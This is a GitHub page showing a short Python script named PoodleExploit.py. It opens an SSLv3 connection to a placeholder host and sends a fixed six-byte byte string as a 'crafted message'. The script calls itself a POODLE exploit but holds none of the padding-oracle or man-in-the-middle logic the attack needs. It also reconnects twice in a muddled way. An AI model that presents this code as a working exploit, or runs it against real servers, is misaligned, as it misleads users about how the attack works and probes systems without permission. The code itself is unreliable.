-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathPoodleExploit.py
More file actions
51 lines (40 loc) · 1.5 KB
/
Copy pathPoodleExploit.py
File metadata and controls
51 lines (40 loc) · 1.5 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import socket
from OpenSSL import SSL
from typing import Any
class PoodleExploit:
def __init__(self, url: str) -> None:
self.url: str = url
self.context: SSL.Context = SSL.Context(SSL.SSLv3_METHOD)
self.connection: SSL.Connection = None
def __enter__(self) -> "PoodleExploit":
self.connect()
return self
def __exit__(self, exc_type: Any, exc_value: Any, traceback: Any) -> None:
self.disconnect()
def connect(self) -> None:
self.connection = SSL.Connection(self.context, socket.socket(socket.AF_INET, socket.SOCK_STREAM))
self.connection.connect((self.url, 443))
def disconnect(self) -> None:
if self.connection:
self.connection.shutdown()
self.connection.close()
def exploit(self) -> None:
try:
self.connect()
self.send_crafted_message()
response = self.receive_response()
print(response)
finally:
self.disconnect()
def send_crafted_message(self) -> None:
if not self.connection:
raise RuntimeError("Connection is not established.")
self.connection.send(b"\x16\x03\x00\x00\x01\x01")
def receive_response(self) -> bytes:
if not self.connection:
raise RuntimeError("Connection is not established.")
return self.connection.recv(1024)
if __name__ == "__main__":
url: str = "vulnerable-site.com"
with PoodleExploit(url) as exploit:
exploit.exploit()